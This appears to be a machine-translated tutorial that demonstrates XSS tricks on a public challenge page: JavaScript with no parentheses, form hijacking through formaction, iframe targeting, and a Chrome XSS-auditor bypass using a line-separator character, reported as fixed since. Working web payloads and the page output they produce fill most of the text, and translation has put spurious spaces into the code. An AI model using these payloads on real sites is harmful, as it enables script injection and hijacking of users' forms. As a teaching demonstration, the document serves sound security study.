Control and bypass related to XSS

I. Start with a little XSS knowledge:

No parentheses:

 

onerror=alert;throw 1;onerror=eval;throw'=alert\x281\x29';

 

2. The button in the form overwrites the form action.

Http://challenge.hackvertor.co.uk/test.php? X = 123

 

<!doctype html><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><body>123 <a href="123">test</a></body>

 

The formaction attribute overwrites the action attribute of the form element.

So
Http://challenge.hackvertor.co.uk/test.php? X = <form> <input type = submit formaction = http://google.com> <textarea name = x>

 

<!doctype html><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><body><form><input type=submit formaction=http://google.com><textarea name=x> <a href="123">test</a></body>

It can be seen that the action attribute of the entire form can be changed when only the input attribute is controlled. And the results are still http://www.google.com.hk /? X = + <a + href = "123"> test </a> </body>
Obviously, x is also part of form. The value is <a href = "123"> test </a> </body>.

Conclusion: The formaction attribute of the button can change the action attribute of the form.

3. Use the <a> label on the same page to control iframe.

<Iframe src = "http://challenge.hackvertor.co.uk/test.php? X = <iframe name = x> </iframe> "> </iframe> <a href =" http://businessinfo.co.uk "target = x id = x> </a> <script> window. onload = function () {x. click ()} </script>
This code instruction uses the <a> label to control the <iframe>
Testing link: http://challenge.hackvertor.co.uk/test.php? X = <iframe name = x> </iframe> <a href = "data: text/html, <script> self. location = 'HTTP: // businessinfo. co. uk '</script> "target = x> Click me </a>

 

<!doctype html><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><body><iframe name=x></iframe><a href="data:text/html,<script>self.location='http://businessinfo.co.uk'</script>" target=x>Click me</a> <a href="123">test</a></body>

 

Click "Clieck me" to load the iframe.

Conclusion: Use the target attribute of the <a> label to control the specified iframe.

4. Example of XSS detection bypassing Google Chrome:

Http://challenge.hackvertor.co.uk/test.php? X = % 3Ca % 20 href = % 22 javascript: alert (1); % E2 % 80% A8-% 3E

Source code:

 

<!doctype html><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><body><a href="javascript：alert(1);
--> <a href="123">test</a></body>

Http://challenge.hackvertor.co.uk/test.php? X = % 3 Ciframe % 20src = % 22 javascript: alert (1) % E2 % 80% A8-% 3E

 

<!doctype html><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><body><iframe src="javascript：alert(1)
--> <a href="123">test</a></body>

 

You can see that the source code contains the special characters % A8, And you can bypass it by adding "->" (HTML comment. (The test is successful under 24.0.1312.52, and the latest version has been repaired)